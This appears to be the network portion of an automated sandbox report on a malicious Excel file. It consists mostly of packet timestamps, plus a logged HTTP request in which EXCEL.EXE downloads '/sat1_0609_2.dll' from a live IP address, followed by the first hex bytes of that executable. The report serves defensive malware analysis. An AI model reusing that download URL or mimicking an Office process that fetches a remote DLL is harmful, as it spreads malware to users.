Jun 10, 2021 08:47:14.846242905 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846246004 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846281052 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846312046 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846317053 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846344948 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846345901 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846369982 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846379995 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846410990 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846410990 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846434116 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846442938 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846461058 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846477032 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846493959 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846517086 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846546888 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846551895 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.846570969 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.846613884 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917197943 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917268991 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917309046 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917335987 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917365074 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917376995 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917402983 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917419910 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917463064 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917469978 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917490005 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917510033 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917530060 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917551041 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917565107 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917589903 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917608976 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917642117 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917644024 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917686939 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917709112 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917728901 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917745113 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917772055 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917785883 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917813063 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917829990 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917854071 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917869091 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917895079 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917916059 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917934895 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917951107 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.917983055 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.917984962 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918028116 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.918040037 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918067932 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.918080091 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918107986 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.918114901 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918148041 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.918159962 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918185949 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.918196917 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.918232918 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919621944 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919662952 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919694901 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919702053 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919713974 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919740915 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919754028 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919779062 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919790030 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919816971 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919832945 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919856071 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919893980 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.919903040 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.919918060 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920010090 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920135021 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920195103 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920202017 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920268059 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920278072 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920311928 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920350075 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920351982 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920383930 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920401096 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920407057 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920443058 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920450926 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920494080 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920506001 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920542955 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920630932 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920680046 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920686007 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920722008 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920744896 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920762062 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920800924 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920802116 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920835018 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920841932 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920855999 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920877934 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920892000 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920917034 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920931101 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.920955896 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.920969009 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921005011 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921005964 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921049118 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921052933 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921087027 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921097994 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921127081 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921132088 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921166897 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921179056 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921205997 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921243906 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921245098 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921255112 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921283960 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921299934 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921330929 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921333075 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921375036 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921403885 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921415091 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921442986 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921454906 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921466112 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921494961 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921508074 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921533108 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921551943 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921572924 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921585083 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921612978 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921624899 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921659946 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921663046 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921705961 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921719074 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921746969 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921778917 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921787024 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921813965 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921828985 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921834946 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921866894 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921906948 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921906948 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921931982 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921947002 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.921958923 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921993971 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.921994925 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922069073 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922137976 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922183037 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922215939 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922246933 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922282934 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922295094 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922310114 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922338009 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922354937 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922377110 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922390938 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922415018 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922434092 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922452927 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922466993 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922491074 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922507048 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922530890 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922569036 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:14.922588110 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:14.922626019 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:47:19.847592115 CEST	80	49715	185.180.199.121	192.168.2.3
Jun 10, 2021 08:47:19.847830057 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:01.110538960 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:01.422548056 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:02.031965971 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:03.235213995 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:05.641872883 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:10.454618931 CEST	49715	80	192.168.2.3	185.180.199.121
Jun 10, 2021 08:49:20.064807892 CEST	49715	80	192.168.2.3	185.180.199.121

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 08:46:54.354038954 CEST	53	50620	8.8.8.8	192.168.2.3
Jun 10, 2021 08:46:54.505465984 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:46:54.574507952 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 10, 2021 08:46:55.634634972 CEST	60152	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:46:55.689102888 CEST	53	60152	8.8.8.8	192.168.2.3
Jun 10, 2021 08:46:56.563294888 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:46:56.613380909 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 10, 2021 08:46:57.730880022 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:46:57.782772064 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 10, 2021 08:46:58.649117947 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:46:58.707473040 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:04.042613029 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:04.096038103 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:09.268500090 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:09.328705072 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:10.449150085 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:10.505249023 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:11.115628958 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:11.206526041 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:11.616766930 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:11.697695017 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:12.662194014 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:12.723540068 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:13.699863911 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:13.763775110 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:13.950685024 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:14.000749111 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:14.951411963 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:15.002082109 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:15.757735014 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:15.835416079 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:18.589926004 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:18.650739908 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:19.465019941 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:19.517235041 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:19.820626020 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:19.882133007 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:20.533198118 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:20.584218025 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:21.966511011 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:22.018001080 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:23.405956984 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:23.458585978 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:24.338181019 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:24.388437986 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:25.562890053 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:25.614483118 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:26.400947094 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:26.454142094 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:32.441203117 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:32.523586988 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:34.850233078 CEST	58722	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:34.850375891 CEST	56596	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:34.850426912 CEST	64101	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:34.900486946 CEST	53	64101	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:34.900531054 CEST	53	58722	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:34.903671980 CEST	53	56596	8.8.8.8	192.168.2.3
Jun 10, 2021 08:47:49.763119936 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:47:49.824455976 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 10, 2021 08:48:10.084192038 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:48:10.144104004 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 10, 2021 08:48:11.003506899 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:48:11.078299999 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 10, 2021 08:48:27.564418077 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:48:27.633446932 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 10, 2021 08:48:47.730214119 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:48:47.790582895 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 10, 2021 08:48:55.064460039 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:48:55.126894951 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:23.217698097 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:23.293245077 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:24.421972990 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:24.482492924 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:47.769274950 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:47.919400930 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:48.855171919 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:49.007555962 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:49.906778097 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:49.966447115 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:50.683506012 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:50.742441893 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:51.607923985 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:51.671933889 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:52.531023026 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:52.592782021 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:53.312422991 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:53.372706890 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:54.486978054 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:54.546250105 CEST	53	56338	8.8.8.8	192.168.2.3
Jun 10, 2021 08:49:55.711319923 CEST	59420	53	192.168.2.3	8.8.8.8
Jun 10, 2021 08:49:55.773751020 CEST	53	59420	8.8.8.8	192.168.2.3

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 08:48:10.144104004 CEST	8.8.8.8	192.168.2.3	0x198d	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.180.199.121

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49715	185.180.199.121	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 08:47:14.443830967 CEST	1190	OUT	GET /sat1_0609_2.dll HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.180.199.121 Connection: Keep-Alive
Jun 10, 2021 08:47:14.522511959 CEST	1194	IN	HTTP/1.1 200 OK Date: Thu, 10 Jun 2021 06:47:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28 Last-Modified: Wed, 09 Jun 2021 20:56:10 GMT ETag: "803e0-5c45b81110e80" Accept-Ranges: bytes Content-Length: 525280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 